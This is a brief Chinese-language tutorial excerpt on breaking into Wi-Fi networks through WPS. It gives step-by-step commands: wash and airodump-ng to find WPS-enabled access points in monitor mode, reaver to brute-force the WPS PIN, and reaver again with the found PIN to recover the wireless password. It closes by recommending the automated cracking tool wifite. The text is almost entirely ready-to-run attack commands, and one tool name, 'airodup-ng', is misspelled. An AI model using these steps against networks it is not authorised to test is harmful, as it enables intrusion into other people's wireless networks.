1、啓用監聽模式(Monitor Mode),發現支持WPS的AP 如果進入監聽模式請查閱前兩章有關WPA WEP攻擊的文章
wash -C -i wlan0mon#-C 忽略錯誤幀 -i 指定網卡
airodup-ng wlan0mon --wps
2、爆破PIN碼
reaver -i wlan0mon -b <AP mac> -vv #-vv 顯示詳細的信息
3、在得出PIN碼後,通過下面指令獲取無線密碼
reaver -i wlan0mon -b <AP mac> -vv -p 88888888 #-p 獲取到的PIN碼
乾貨!!綜合自動化無線密碼破解工具 wifite